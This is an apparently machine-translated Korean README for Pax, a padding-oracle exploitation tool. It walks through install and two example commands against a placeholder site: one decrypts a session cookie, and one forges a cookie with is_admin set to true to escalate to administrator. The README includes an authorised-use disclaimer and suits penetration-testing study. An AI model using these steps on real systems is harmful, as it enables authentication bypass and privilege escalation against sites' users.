
💀 🔓 PKCS7 패딩 오라클 공격을 위한 CLI 도구
재미와 이익을 위해 패딩 오라클을 익스플로잇하세요!
Pax (PAdding oracle eXploiter)는 패딩 오라클을 익스플로잇하기 위한 도구로, 다음을 수행합니다:
이것은 암호화된 세션 정보를 노출하는 데 사용될 수 있으며, 종종 인증을 우회하고, 권한을 상승시키며, 사용자 정의 평문을 암호화하여 서버에 다시 써서 원격으로 코드를 실행하는 데 사용됩니다.
항상 그렇듯이, 이 도구는 귀하가 소유하고 있거나 프로브할 권한이 있는 시스템에서만 사용해야 합니다!
릴리스에서 다운로드하거나 Go로 설치하십시오:
go get -u github.com/liamg/pax/cmd/pax
암호화된 데이터가 SESS라는 쿠키에 저장된 의심되는 오라클을 발견하면 다음을 사용할 수 있습니다:
pax decrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D"
이것은 바라건대 당신에게 평문을 제공할 것입니다, 아마도 다음과 같은 것:
{"user_id": 456, "is_admin": false}
여기서 권한을 상승시킬 수 있을 것 같습니다!
먼저 오라클이 교활한 평문으로 복호화할 자신만의 암호화 데이터를 생성하여 시도할 수 있습니다:
pax encrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D" --plain-text '{"user_id": 456, "is_admin": true}'
이것은 또 다른 base64 인코딩된 암호화 데이터를 출력할 것입니다, 아마도 다음과 같은 것:
dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=
이제 브라우저를 열고 SESS 쿠키의 값을 위의 값으로 설정할 수 있습니다. 원래 오라클 페이지를 로드하면 이제 관리자 수준으로 상승된 것을 볼 수 있습니다.
다음은 이 공격이 어떻게 작동하는지에 대한 훌륭한 가이드입니다: